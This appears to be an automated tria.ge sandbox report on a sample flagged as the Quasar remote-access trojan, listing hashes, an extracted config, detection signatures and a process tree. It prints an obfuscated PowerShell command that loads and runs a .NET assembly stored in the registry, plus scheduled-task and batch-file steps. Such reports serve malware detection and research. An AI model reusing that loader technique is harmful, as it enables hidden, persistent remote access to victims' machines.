Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/01/2025, 05:48
Behavioral task
behavioral1
Sample
24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
Resource
win10v2004-20241007-en
General
-
Target
24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe
-
Size
5.4MB
-
MD5
dd2c5095b1d6590197ed2432837655f0
-
SHA1
d287bb38f83941199fa66d7420b6f8cff2257a16
-
SHA256
24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999
-
SHA512
24d7f1b61f07060f7723a306d46b1d82ca1b54a93770bfb783b83f613edb9a412f929a40c396fda5b6b3402ca37531f53ce1d42524623a6ce1cfee61e726e283
-
SSDEEP
98304:zHTFcsxxcsx30XgnNvfSDRyhoVi8rhh+xX/r:zHOgn0DRy2oR/r
Malware Config
Extracted
quasar
-
encryption_key
329720B689F7B7703EAAA9546BE3BAFE737B0649
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/1580-1-0x0000000001230000-0x0000000001798000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2664 created 432 2664 powershell.EXE 5 -
pid Process 2664 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2968 set thread context of 2616 2968 powershell.exe 34 PID 2664 set thread context of 1604 2664 powershell.EXE 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 884 PING.EXE -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b01959464871db01 powershell.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 884 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 2664 powershell.EXE 2664 powershell.EXE 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe 1604 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe Token: SeDebugPrivilege 2664 powershell.EXE Token: SeDebugPrivilege 2664 powershell.EXE Token: SeDebugPrivilege 1604 dllhost.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 1580 wrote to memory of 2908 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 30 PID 1580 wrote to memory of 2908 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 30 PID 1580 wrote to memory of 2908 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 30 PID 1580 wrote to memory of 2968 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 32 PID 1580 wrote to memory of 2968 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 32 PID 1580 wrote to memory of 2968 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 32 PID 1580 wrote to memory of 2968 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 32 PID 1580 wrote to memory of 2968 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 32 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2968 wrote to memory of 2616 2968 powershell.exe 34 PID 2584 wrote to memory of 2664 2584 taskeng.exe 36 PID 2584 wrote to memory of 2664 2584 taskeng.exe 36 PID 2584 wrote to memory of 2664 2584 taskeng.exe 36 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 2664 wrote to memory of 1604 2664 powershell.EXE 38 PID 1604 wrote to memory of 432 1604 dllhost.exe 5 PID 1604 wrote to memory of 476 1604 dllhost.exe 6 PID 1580 wrote to memory of 1724 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 39 PID 1580 wrote to memory of 1724 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 39 PID 1580 wrote to memory of 1724 1580 24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe 39 PID 1724 wrote to memory of 916 1724 cmd.exe 41 PID 1724 wrote to memory of 916 1724 cmd.exe 41 PID 1724 wrote to memory of 916 1724 cmd.exe 41 PID 1724 wrote to memory of 884 1724 cmd.exe 42 PID 1724 wrote to memory of 884 1724 cmd.exe 42 PID 1724 wrote to memory of 884 1724 cmd.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d64a87c8-d3a5-47e2-a772-a2e09b1855bc}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Users\Admin\AppData\Local\Temp\24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe"C:\Users\Admin\AppData\Local\Temp\24bbfa8d70a5d5e74791b0af93c77802df7e965b14b0649aaec2ab8dd0e0c999.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F2⤵PID:2908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2616
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G9T1ti74EuwA.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:916
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:884
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {42A62481-6770-41EA-960C-F5A894FF4C1C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+'n'+''+'y'+''+[Char](97)+''+[Char](45)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
166B
MD56b1c895d21f29a065dfaae4b74e2686c
SHA1773e44d04792c3d82ab80ba748773e6290504a1f
SHA256e3e9d93b29dffc7699242fd5bcd0065a22203e96a06c9f6f62349b700a04af24
SHA51205de89da0e7c07ea89761b32ecc327d63d672fe4229bb046b22a304e717eae16d1626607a7fbaa09fbf50151a4e37cf4e9d64415f86f1519292a7d5992292eb8